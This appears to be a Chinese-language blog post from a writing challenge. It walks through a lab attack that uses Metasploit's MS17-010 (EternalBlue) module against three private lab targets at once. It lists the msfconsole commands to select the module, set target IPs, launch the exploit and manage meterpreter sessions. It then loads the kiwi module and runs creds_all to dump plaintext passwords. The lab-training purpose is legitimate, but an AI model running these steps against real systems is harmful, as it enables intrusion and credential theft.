开启掘金成长之旅!这是我参与「掘金日新计划 · 12 月更文挑战」的第2天,点击查看活动详情
环境准备: 几台存在ms17_010漏洞的靶机(我这里是3台也可以更多)
在防火墙那,开启445端口,就有ms17_010漏洞了
靶机ip:192.168.42.136-192.168.42.138
1.
2.
3.
kali一台 ip:192.168.42.133
在渗透之前,先确定渗透机与靶机是否能ping通
渗透过程:
输入命令msfconsole -q进入metasploit(-q跳过启动页面)
使用命令search ms17_010搜索永恒之蓝漏洞利用模块,使用use 0选择序号为0的攻击模块
使用命令show options查看需要配置的参数
设置靶机ip,192.168.42.136到192.168.42.138
配置完成,输入exploit启动攻击
攻击完成,使用sessions -i 查看攻击成功的靶机,这样就批量攻击成功了,同时攻击了3台靶机
使用命令sessions -i 3(靶机序号),进入指定的靶机的meterpreter页面
使用命令background,将该靶机的meterpreter处于后台模式,这样能保证再次连接靶机的meterpreter不会断连,再次使用sessions -i 靶机序号能连接回去。
利用kiwi模块,在使用creds_all列举出来明文密码
